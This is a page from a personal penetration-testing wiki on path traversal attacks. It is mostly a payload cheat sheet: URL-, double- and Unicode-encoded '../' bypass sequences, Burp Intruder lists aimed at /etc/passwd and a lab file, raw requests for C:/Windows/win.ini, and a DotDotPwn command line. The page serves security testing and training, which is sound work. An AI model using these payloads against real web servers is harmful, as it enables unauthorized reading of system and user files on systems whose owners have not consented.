❎
wiki.hackerlab.cz
  • About me
  • Vulnerability Assessment
  • CLOUD PENTESTING
    • AWS
    • GCP
    • Microsoft Azure
    • Labs
  • REST API - Bypasses and Privilege Escalations
  • Python Virtual Environment (VENV)
  • OSINT & Information Gathering
  • Web Pentesting
    • JavaScript .maps
    • SSRF
    • LDAP Injection
    • Django ORM Exploitation
    • HTTP Request Smuggling
    • Server Side Template Injection (SSTI)
    • Insecure Deserialization
    • Brute force
    • Shell Fu - Oneliners
    • CORS
    • Special Chars & NULL Bytes
    • XSS
    • XXE
    • Nuclei
    • SQL Injection
    • Blind SQL Injection
    • SQLmap
    • NoSQL Injection
    • CRLF Injection
    • Input Validation - Fuzz1
    • HTTP Headers - X-Forwarded
    • Log4j
    • Enumeration with Wordlists
    • Bug Bounty - Web Recon
    • HTTP Proxy Override
    • CSV Injection
    • Windows Forbidden File Names
    • Path Traversal
    • OS Command Injection
    • Open Redirect
    • JWT Tool
    • Burp Extensions - TokenJAR & ATOR
    • Upload RCE
    • GUID and UUIDs
  • Toolset
    • Git - Repo and Tools
    • Docker for Pentesters
  • Infrastructure Pentesting
    • Active Directory (AD)
      • Vulnerable Machines (labs)
      • Pass the hash
      • Azure Active Directory
      • Password Cracking
      • Domain Enumeration
      • LLMNR Poisoning with Responder
      • HTB Forest
      • LDAP
      • WinRM
      • SMB & RPC Enumeration
      • SMB Relay
      • Impacket
      • Bloodhound
      • OWA Exchange Server 2019
      • Active Directory Web Services (ADWS)
      • Active Directory Attacks
    • Mail Server Attacks
    • NFS Enumeration
    • Windows PostExploitation
      • Windows Enumeration
      • Powershell Payloads
      • Add RDP Account & Ride on Meterpreter
    • Dump File Analysis
  • Other Pentest Projects
    • Security Projects
  • WIFI Pentesting
    • Kali Linux - Alpha card AWUS 1900 (VirtualBox)
    • Active Card & Monitor Mode
    • Aircrack-ng Suite
  • Certs
    • Burp Suite Certified Practitioner
  • Linux
    • Network Manager
  • Books
    • The Hacker Playbook 3
Powered by GitBook
On this page
  • Platform - Filename and Path
  • Simple
  • URL encoding
  • Double URL encoding
  • UTF-8 bit Unicode
  • 16 bit Unicode
  • Bypass Path Sequence
  • Intruder
  • Payload 1 - Traversal directory sequence, deep 6
  • Payload 2 - Filename
  • Web Server Path Traversal Attacks
  • Tools
  • DotDotPwn
  • References

Was this helpful?

  1. Web Pentesting

Path Traversal

Path traversal attacks

A directory traversal vulnerability can be present inside a web server, inside an application framework (during the HTTP request pre-processing and routing), or within an application endpoint that processes data according to application logic (for example, reading a file from storage based on its name).

Platform - Filename and Path

You need to figure out a platform in order to know how to address specific files. For Linux, a good file to read is/etc/passwwhich is readable every time. On Windows, you can choose C:\Windows\win.ini

Simple

../../../etc/passwd

URL encoding

. = %2e
/ = %2f
\ = %5c

Double URL encoding

. = %252e
/ = %252f
\ = %255c

UTF-8 bit Unicode

. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

16 bit Unicode

. = %u002e
/ = %u2215
\ = %u2216

Bypass Path Sequence

../
.../
..../
..\
..\/
..;/
..././
...\.\
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216

Intruder

Don't forget to disable URL encoding for the both next Payloads (payload1,payload2)

Payload 1 - Traversal directory sequence, deep 6

../
../../
../../../
../../../../
../../../../../
../../../../../../
.../
.../.../
.../.../.../
.../.../.../.../
.../.../.../.../.../
.../.../.../.../.../.../
...//
...//...//
...//...//...//
...//...//...//...//
...//...//...//...//...//
...//...//...//...//...//...//
....//....//
....//....//....//
....//....//....//....//
....//....//....//....//....//
....//....//....//....//....//....//
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
...\
...\...\
...\...\...\
...\...\...\...\
...\...\...\...\...\
...\...\...\...\...\...\
....\\....\\
....\\....\\....\\
....\\....\\....\\....\\
....\\....\\....\\....\\....\\
....\\....\\....\\....\\....\\....\\
....\/
....\/....\/
....\/....\/....\/
....\/....\/....\/....\/
....\/....\/....\/....\/....\/
....\/....\/....\/....\/....\/....\/
..\/
..\/..\/
..\/..\/..\/
..\/..\/..\/..\/
..\/..\/..\/..\/..\/
..\/..\/..\/..\/..\/..\/
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/
..././
..././..././
..././..././..././
..././..././..././..././
..././..././..././..././..././
..././..././..././..././..././..././
...\.\
...\.\...\.\
...\.\...\.\...\.\
...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\...\.\
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
..%c0%af
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216

Payload 2 - Filename

etc/passwd
etc/passwd%00
etc/passwd%00.jpg
etc/passwd%00.png
etc//passwd
etc\passwd
etc\\passwd
etc%2fpasswd
etc%252fpasswd
etc%c0%afpasswd
etc%c0%af%e0%80%afpasswd
etc%c0%2fpasswd
etc%c0%5cpasswd
etc%c0%80%5cpasswd
etc%u2215passwd
etc%u2216passwd
home/carlos/secret
home/carlos/secret%00
home/carlos/secret%00.jpg
home/carlos/secret%00.png
home//carlos//secret
home\carlos\secret
home\\carlos\\secret
home%2fcarlos%2fsecret
home%252fcarlos%252fsecret
home%c0%afcarlos%c0%afsecret
home%c0%af%e0%80%afcarlos%c0%af%e0%80%afsecret
home%c0%2fcarlos%c0%2fsecret
home%c0%5ccarlos%c0%5csecret
home%c0%80%5ccarlos%c0%80%5csecret
home%u2215carlos%u2215secret
home%u2216carlos%u2216secret

Web Server Path Traversal Attacks

GET C:/Windows/win.ini
GET /C:/Windows/win.ini
GET file:///Windows/win.ini
GET /~/Windows/win.ini

Tools

DotDotPwn

dotdotpwn -m http-url -u https://example.com/TRAVERSAL -f /etc/passwd -k root  

References

PreviousWindows Forbidden File NamesNextOS Command Injection

Last updated 2 years ago

Was this helpful?

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
https://gracefulsecurity.com/path-traversal-cheat-sheet-linux/
https://www.kali.org/tools/dotdotpwn/